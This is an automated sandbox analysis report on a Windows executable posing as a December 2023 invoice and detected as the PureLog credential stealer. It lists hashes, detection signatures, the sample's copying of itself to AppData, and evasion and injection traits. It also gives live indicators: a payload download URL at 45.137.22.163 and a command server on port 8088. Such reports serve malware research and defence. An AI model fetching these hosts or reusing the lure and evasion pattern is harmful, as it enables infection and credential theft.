Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
invoices---DEC_2023.exe

Overview

General Information

Sample name:invoices---DEC_2023.exe
Analysis ID:1364951
MD5:0483a991fb043b8fddcf818ada08b3a1
SHA1:11f8037e019382be07f2c37210f388553b2a3760
SHA256:85015ad6ba1de268a69c138776c23e9d1a39a69063d525f74b1ef349b9031ffd
Tags:exe
Infos:

Detection

PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the context of a thread in another process (thread injection)
Sample has a suspicious name (potential lure to open the executable)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Yara detected Costura Assembly Loader
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • invoices---DEC_2023.exe (PID: 2148 cmdline: C:\Users\user\Desktop\invoices---DEC_2023.exe MD5: 0483A991FB043B8FDDCF818ADA08B3A1)
    • invoices---DEC_2023.exe (PID: 748 cmdline: C:\Users\user\Desktop\invoices---DEC_2023.exe MD5: 0483A991FB043B8FDDCF818ADA08B3A1)
  • fikk.exe (PID: 4448 cmdline: "C:\Users\user\AppData\Roaming\fikk.exe" MD5: 0483A991FB043B8FDDCF818ADA08B3A1)
    • fikk.exe (PID: 1976 cmdline: C:\Users\user\AppData\Roaming\fikk.exe MD5: 0483A991FB043B8FDDCF818ADA08B3A1)
  • fikk.exe (PID: 3372 cmdline: "C:\Users\user\AppData\Roaming\fikk.exe" MD5: 0483A991FB043B8FDDCF818ADA08B3A1)
    • fikk.exe (PID: 3812 cmdline: C:\Users\user\AppData\Roaming\fikk.exe MD5: 0483A991FB043B8FDDCF818ADA08B3A1)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.2592378463.000001FED9336000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
    00000000.00000002.2039823779.000001C122B10000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
      00000000.00000002.2048259063.000001C127810000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
        00000005.00000002.2525528464.000002797BC70000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
          00000002.00000002.3249333538.000001EE90856000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
            Click to see the 20 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            7.2.fikk.exe.1fed93365a8.7.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              5.2.fikk.exe.2797bc70000.10.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                2.2.invoices---DEC_2023.exe.1ee908565a8.6.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                  5.2.fikk.exe.279108565a8.4.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                    0.2.invoices---DEC_2023.exe.1c122930e38.4.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                      Click to see the 14 entries

                      Sigma Signatures

                      No Sigma rule has matched

                      Snort Signatures

                      No Snort rule has matched

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus / Scanner detection for submitted sample
                      Source: invoices---DEC_2023.exeAvira: detected
                      Antivirus detection for URL or domain
                      Source: http://45.137.22.163/Wowoqku.wavAvira URL Cloud: Label: malware
                      Source: http://45.137.22.163Avira URL Cloud: Label: malware
                      Antivirus detection for dropped file
                      Source: C:\Users\user\AppData\Roaming\fikk.exeAvira: detection malicious, Label: HEUR/AGEN.1360909
                      Multi AV Scanner detection for domain / URL
                      Source: http://45.137.22.163/Wowoqku.wavVirustotal: Detection: 12%Perma Link
                      Source: http://45.137.22.163Virustotal: Detection: 13%Perma Link
                      Multi AV Scanner detection for dropped file
                      Source: C:\Users\user\AppData\Roaming\fikk.exeReversingLabs: Detection: 18%
                      Source: C:\Users\user\AppData\Roaming\fikk.exeVirustotal: Detection: 37%Perma Link
                      Multi AV Scanner detection for submitted file
                      Source: invoices---DEC_2023.exeReversingLabs: Detection: 18%
                      Source: invoices---DEC_2023.exeVirustotal: Detection: 37%Perma Link
                      Machine Learning detection for dropped file
                      Source: C:\Users\user\AppData\Roaming\fikk.exeJoe Sandbox ML: detected
                      Machine Learning detection for sample
                      Source: invoices---DEC_2023.exeJoe Sandbox ML: detected
                      Source: invoices---DEC_2023.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: costura.dotnetzip.pdb.compressed source: invoices---DEC_2023.exe, 00000002.00000002.3243572943.000001EE80001000.00000004.00000800.00020000.00000000.sdmp, invoices---DEC_2023.exe, 00000002.00000002.3249333538.000001EE90856000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2511602813.00000279106B9000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2508019011.0000027900001000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000007.00000002.2592378463.000001FED9336000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000007.00000002.2586831322.000001FEC8B29000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: costura.dotnetzip.pdb.compressed source: invoices---DEC_2023.exe, 00000002.00000002.3243572943.000001EE80001000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2508019011.0000027900001000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000007.00000002.2586831322.000001FEC8B29000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: costura.dotnetzip.pdb.compressed2! source: invoices---DEC_2023.exe, 00000002.00000002.3243572943.000001EE80001000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2508019011.0000027900001000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000007.00000002.2586831322.000001FEC8B29000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: 37d4c34f-a7fd-478e-84fe-ac246c9c46bb<Module>costura.costura.dll.compressedcostura.dotnetzip.dll.compressedcostura.dotnetzip.pdb.compressedcostura.protobuf-net.dll.compressedFoytgem.g.resourcesaR3nbf8dQp2feLmk31.lSfgApatkdxsVcGcrktoFd.resources source: invoices---DEC_2023.exe, 00000002.00000002.3249333538.000001EE90856000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2511602813.00000279106B9000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000007.00000002.2592378463.000001FED9336000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: @costura.dotnetzip.pdb.compressed source: invoices---DEC_2023.exe, 00000002.00000002.3243572943.000001EE80001000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2508019011.0000027900001000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000007.00000002.2586831322.000001FEC8B29000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: invoices---DEC_2023.exe, 00000000.00000002.2038776044.000001C10EAE9000.00000004.00000800.00020000.00000000.sdmp, invoices---DEC_2023.exe, 00000000.00000002.2048782210.000001C127910000.00000004.08000000.00040000.00000000.sdmp, invoices---DEC_2023.exe, 00000000.00000002.2039823779.000001C122B10000.00000004.00000800.00020000.00000000.sdmp, invoices---DEC_2023.exe, 00000002.00000002.3243572943.000001EE80001000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000003.00000002.2199934431.000002A4C80AF000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2511602813.00000279106B9000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2508019011.0000027900001000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2511602813.0000027910968000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000006.00000002.2279392532.000001D909937000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdb source: invoices---DEC_2023.exe, 00000000.00000002.2038776044.000001C10EAE9000.00000004.00000800.00020000.00000000.sdmp, invoices---DEC_2023.exe, 00000000.00000002.2048782210.000001C127910000.00000004.08000000.00040000.00000000.sdmp, invoices---DEC_2023.exe, 00000000.00000002.2039823779.000001C122B10000.00000004.00000800.00020000.00000000.sdmp, invoices---DEC_2023.exe, 00000002.00000002.3243572943.000001EE80001000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000003.00000002.2199934431.000002A4C80AF000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2511602813.00000279106B9000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2508019011.0000027900001000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2511602813.0000027910968000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000006.00000002.2279392532.000001D909937000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: Foytgem.pdb source: invoices---DEC_2023.exe, 00000002.00000002.3249333538.000001EE907BC000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2511602813.00000279106B9000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2511602813.00000279102E1000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000007.00000002.2592378463.000001FED929C000.00000004.00000800.00020000.00000000.sdmp
                      Source: global trafficTCP traffic: 192.168.2.5:49705 -> 5.252.165.214:8088
                      Source: global trafficHTTP traffic detected: GET /Wowoqku.wav HTTP/1.1Host: 45.137.22.163Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /Wowoqku.wav HTTP/1.1Host: 45.137.22.163Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /Wowoqku.wav HTTP/1.1Host: 45.137.22.163Connection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 45.137.22.163 45.137.22.163
                      Source: Joe Sandbox ViewIP Address: 45.137.22.163 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                      Source: global trafficHTTP traffic detected: GET /Wowoqku.wav HTTP/1.1Host: 45.137.22.163Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /Wowoqku.wav HTTP/1.1Host: 45.137.22.163Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /Wowoqku.wav HTTP/1.1Host: 45.137.22.163Connection: Keep-Alive
                      Source: invoices---DEC_2023.exe, fikk.exe.0.drString found in binary or memory: http://127.0.0.1:
                      Source: invoices---DEC_2023.exe, 00000000.00000002.2038776044.000001C10E9B1000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000003.00000002.2199934431.000002A4C7F71000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000006.00000002.2279392532.000001D909810000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.137.22.163
                      Source: invoices---DEC_2023.exe, fikk.exe.0.drString found in binary or memory: http://45.137.22.163/Wowoqku.wav
                      Source: invoices---DEC_2023.exe, 00000000.00000002.2038776044.000001C10E9B1000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000003.00000002.2199934431.000002A4C7F71000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000006.00000002.2279392532.000001D909810000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: invoices---DEC_2023.exe, 00000000.00000002.2038776044.000001C10EAE9000.00000004.00000800.00020000.00000000.sdmp, invoices---DEC_2023.exe, 00000000.00000002.2048782210.000001C127910000.00000004.08000000.00040000.00000000.sdmp, invoices---DEC_2023.exe, 00000000.00000002.2039823779.000001C122B10000.00000004.00000800.00020000.00000000.sdmp, invoices---DEC_2023.exe, 00000002.00000002.3243572943.000001EE80001000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000003.00000002.2199934431.000002A4C80AF000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2511602813.00000279106B9000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2508019011.0000027900001000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2511602813.0000027910968000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000006.00000002.2279392532.000001D909937000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                      Source: invoices---DEC_2023.exe, 00000000.00000002.2038776044.000001C10EAE9000.00000004.00000800.00020000.00000000.sdmp, invoices---DEC_2023.exe, 00000000.00000002.2048782210.000001C127910000.00000004.08000000.00040000.00000000.sdmp, invoices---DEC_2023.exe, 00000000.00000002.2039823779.000001C122B10000.00000004.00000800.00020000.00000000.sdmp, invoices---DEC_2023.exe, 00000002.00000002.3243572943.000001EE80001000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000003.00000002.2204458886.000002A4DC281000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000003.00000002.2199934431.000002A4C80AF000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2511602813.00000279106B9000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2508019011.0000027900001000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2511602813.0000027910968000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000006.00000002.2283674148.000001D91DB11000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000006.00000002.2279392532.000001D909937000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                      Source: invoices---DEC_2023.exe, 00000000.00000002.2038776044.000001C10EAE9000.00000004.00000800.00020000.00000000.sdmp, invoices---DEC_2023.exe, 00000000.00000002.2048782210.000001C127910000.00000004.08000000.00040000.00000000.sdmp, invoices---DEC_2023.exe, 00000000.00000002.2039823779.000001C122B10000.00000004.00000800.00020000.00000000.sdmp, invoices---DEC_2023.exe, 00000002.00000002.3243572943.000001EE80001000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000003.00000002.2199934431.000002A4C80AF000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2511602813.00000279106B9000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2508019011.0000027900001000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2511602813.0000027910968000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000006.00000002.2279392532.000001D909937000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                      Source: invoices---DEC_2023.exe, 00000000.00000002.2038776044.000001C10EAE9000.00000004.00000800.00020000.00000000.sdmp, invoices---DEC_2023.exe, 00000000.00000002.2048782210.000001C127910000.00000004.08000000.00040000.00000000.sdmp, invoices---DEC_2023.exe, 00000000.00000002.2039823779.000001C122B10000.00000004.00000800.00020000.00000000.sdmp, invoices---DEC_2023.exe, 00000002.00000002.3243572943.000001EE80001000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000003.00000002.2199934431.000002A4C80AF000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2511602813.00000279106B9000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2508019011.0000027900001000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2511602813.0000027910968000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000006.00000002.2279392532.000001D909937000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                      Source: fikk.exe, 00000006.00000002.2279392532.000001D909937000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000007.00000002.2586831322.000001FEC8BFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                      Source: invoices---DEC_2023.exe, 00000000.00000002.2048782210.000001C127910000.00000004.08000000.00040000.00000000.sdmp, invoices---DEC_2023.exe, 00000000.00000002.2039823779.000001C122B10000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2511602813.00000279106B9000.00000004.00000800.00020000.00000000.sdmp, fikk.exe, 00000005.00000002.2511602813.0000027910968000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354

                      System Summary

                      barindex
                      Initial sample is a PE file and has a suspicious name
                      Source: initial sampleStatic PE information: Filename: invoices---DEC_2023.exe
                      Sample has a suspicious name (potential lure to open the executable)
                      Source: invoices---DEC_2023.exeStatic file information: Suspicious name
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeCode function: 0_2_00007FF848F148DE0_2_00007FF848F148DE
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeCode function: 2_2_00007FF848FF1E2E2_2_00007FF848FF1E2E
                      Source: C:\Users\user\AppData\Roaming\fikk.exeCode function: 3_2_00007FF848F448DE3_2_00007FF848F448DE
                      Source: C:\Users\user\AppData\Roaming\fikk.exeCode function: 5_2_00007FF848FE1B445_2_00007FF848FE1B44
                      Source: C:\Users\user\AppData\Roaming\fikk.exeCode function: 6_2_00007FF848F5F3806_2_00007FF848F5F380
                      Source: C:\Users\user\AppData\Roaming\fikk.exeCode function: 7_2_00007FF848F3D2F37_2_00007FF848F3D2F3
                      Source: C:\Users\user\AppData\Roaming\fikk.exeCode function: 7_2_00007FF848F3D1F37_2_00007FF848F3D1F3
                      Source: C:\Users\user\AppData\Roaming\fikk.exeCode function: 7_2_00007FF848F3D4D37_2_00007FF848F3D4D3
                      Source: C:\Users\user\AppData\Roaming\fikk.exeCode function: 7_2_00007FF848F3D0E37_2_00007FF848F3D0E3
                      Source: fikk.exe.0.drStatic PE information: No import functions for PE file found
                      Source: invoices---DEC_2023.exeStatic PE information: No import functions for PE file found
                      Source: invoices---DEC_2023.exe, 00000000.00000002.2038776044.000001C10EAE9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs invoices---DEC_2023.exe
                      Source: invoices---DEC_2023.exe, 00000000.00000002.2038776044.000001C10EAE9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameKsdrzconmz.exe" vs invoices---DEC_2023.exe
                      Source: invoices---DEC_2023.exe, 00000000.00000000.1992325575.000001C10CC9C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameliol.exe" vs invoices---DEC_2023.exe
                      Source: invoices---DEC_2023.exe, 00000000.00000002.2048782210.000001C127910000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs invoices---DEC_2023.exe
                      Source: invoices---DEC_2023.exe, 00000000.00000002.2039823779.000001C122B10000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs invoices---DEC_2023.exe
                      Source: invoices---DEC_2023.exe, 00000002.00000002.3243572943.000001EE80001000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs invoices---DEC_2023.exe
                      Source: invoices---DEC_2023.exe, 00000002.00000002.3249333538.000001EE907BC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameFoytgem.dll" vs invoices---DEC_2023.exe
                      Source: invoices---DEC_2023.exeBinary or memory string: OriginalFilenameliol.exe" vs invoices---DEC_2023.exe
                      Source: 0.2.invoices---DEC_2023.exe.1c11eba1b58.3.raw.unpack, DispatcherAttrInstance.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.invoices---DEC_2023.exe.1c11eba1b58.3.raw.unpack, DispatcherAttrInstance.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.invoices---DEC_2023.exe.1c11eba1b58.3.raw.unpack, DispatcherAttrInstance.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.invoices---DEC_2023.exe.1c11eba1b58.3.raw.unpack, StubClientConfig.csTask registration methods: 'CreateTask'
                      Source: 0.2.invoices---DEC_2023.exe.1c11eba1b58.3.raw.unpack, Collection.csTask registration methods: 'RegisterTask'
                      Source: classification engineClassification label: mal100.troj.evad.winEXE@9/4@0/2
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeFile created: C:\Users\user\AppData\Roaming\fikk.exeJump to behavior
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeMutant created: \Sessions\1\BaseNamedObjects\5bec48dd15fbca32
                      Source: invoices---DEC_2023.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: invoices---DEC_2023.exeStatic file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dllJump to behavior
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dllJump to behavior
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: invoices---DEC_2023.exeReversingLabs: Detection: 18%
                      Source: invoices---DEC_2023.exeVirustotal: Detection: 37%
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeFile read: C:\Users\user\Desktop\invoices---DEC_2023.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\invoices---DEC_2023.exe C:\Users\user\Desktop\invoices---DEC_2023.exe
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeProcess created: C:\Users\user\Desktop\invoices---DEC_2023.exe C:\Users\user\Desktop\invoices---DEC_2023.exe
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\fikk.exe "C:\Users\user\AppData\Roaming\fikk.exe"
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess created: C:\Users\user\AppData\Roaming\fikk.exe C:\Users\user\AppData\Roaming\fikk.exe
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\fikk.exe "C:\Users\user\AppData\Roaming\fikk.exe"
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess created: C:\Users\user\AppData\Roaming\fikk.exe C:\Users\user\AppData\Roaming\fikk.exe
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeProcess created: C:\Users\user\Desktop\invoices---DEC_2023.exe C:\Users\user\Desktop\invoices---DEC_2023.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess created: C:\Users\user\AppData\Roaming\fikk.exe C:\Users\user\AppData\Roaming\fikk.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fikk.exeProcess created: C:\Users\user\AppData\Roaming\fikk.exe C:\Users\user\AppData\Roaming\fikk.exeJump to behavior
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: C:\Users\user\Desktop\invoices---DEC_2023.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                      Source: invoices---DEC_2023.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: invoices---DEC_2023.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
